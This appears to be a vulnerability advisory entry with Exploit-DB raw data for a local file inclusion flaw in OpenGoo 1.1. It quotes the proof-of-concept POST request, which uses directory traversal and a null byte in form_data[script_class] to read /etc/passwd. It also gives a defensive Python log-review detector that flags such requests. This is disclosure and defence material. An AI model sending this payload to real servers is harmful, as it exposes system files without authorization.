Vendor: OpenGoo
By: Notified
CVSS: 7.5 HIGH
Local File Inclusion
CWE: 98
Product Name: OpenGoo
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: No
Related CWE: N/A
CPE: a:opengoo:opengoo:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

OpenGoo 1.1 Local File Inclusion

OpenGoo 1.1 is vulnerable to Local File Inclusion. The issue is exploitable when register_globals is set to On and magic_quotes_gpc is set to Off. Under those settings, an attacker can include a file by manipulating the form_data[script_class] parameter in a POST request to public/upgrade/index.php; the published request combines directory traversal with a %00 null byte to reach /etc/passwd.

Mitigation:

Ensure that register_globals and magic_quotes_gpc are set to Off.
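
For reviewing web server or WAF logs, the following added example (not part of the advisory or of OpenGoo) flags POST bodies to the upgrade endpoint whose form_data[script_class] value carries a null byte, directory traversal or path separators. It assumes a legitimate value is a bare PHP class name; the function names and the class name SampleUpgradeScript are hypothetical.

```python
import re
from urllib.parse import parse_qsl

PARAM = "form_data[script_class]"             # parameter named in the advisory
UPGRADE_SUFFIX = "/public/upgrade/index.php"  # endpoint path from the advisory
# Assumption: a legitimate value is a bare PHP class name, nothing else.
CLASS_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def script_class_findings(post_body):
    """Return the reasons a urlencoded POST body's script_class value is suspicious."""
    findings = []
    # parse_qsl percent-decodes names and values, so %00 arrives as "\x00"
    # and form_data%5Bscript_class%5D still matches PARAM.
    for name, value in parse_qsl(post_body, keep_blank_values=True):
        if name != PARAM:
            continue
        segments = value.replace("\\", "/").split("/")
        if "\x00" in value:
            findings.append("null byte")
        if ".." in segments:
            findings.append("directory traversal")
        if len(segments) > 1:
            findings.append("path separator")
        # Anything else that is not an identifier (e.g. double-encoded input).
        if not findings and not CLASS_NAME.fullmatch(value):
            findings.append("not a plain class name")
    return findings


def flag_requests(records):
    """records: iterable of (url_path, post_body). Returns [(url_path, findings)]."""
    hits = []
    for path, body in records:
        if path.endswith(UPGRADE_SUFFIX):
            findings = script_class_findings(body)
            if findings:
                hits.append((path, findings))
    return hits


# Constructed sample records: the first body is the request quoted in the advisory,
# the second uses a hypothetical class name.
SAMPLE = [
    ("/opengoo/public/upgrade/index.php",
     "form_data[script_class]=/../../../../../../../../../../../etc/passwd%00.html"),
    ("/opengoo/public/upgrade/index.php",
     "form_data%5Bscript_class%5D=SampleUpgradeScript"),
]
```
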

Exploit-DB raw data:

OpenGoo 1.1 Local File Inclusion
http://www.opengoo.org/

magic_quotes_gpc = Off
register_globals = On

http://site/opengoo/public/upgrade/index.php
POST: form_data[script_class]=/../../../../../../../../../../../etc/passwd%00.html

Author Notified: Jan. 18

http://nukeit.org

# milw0rm.com [2009-01-25]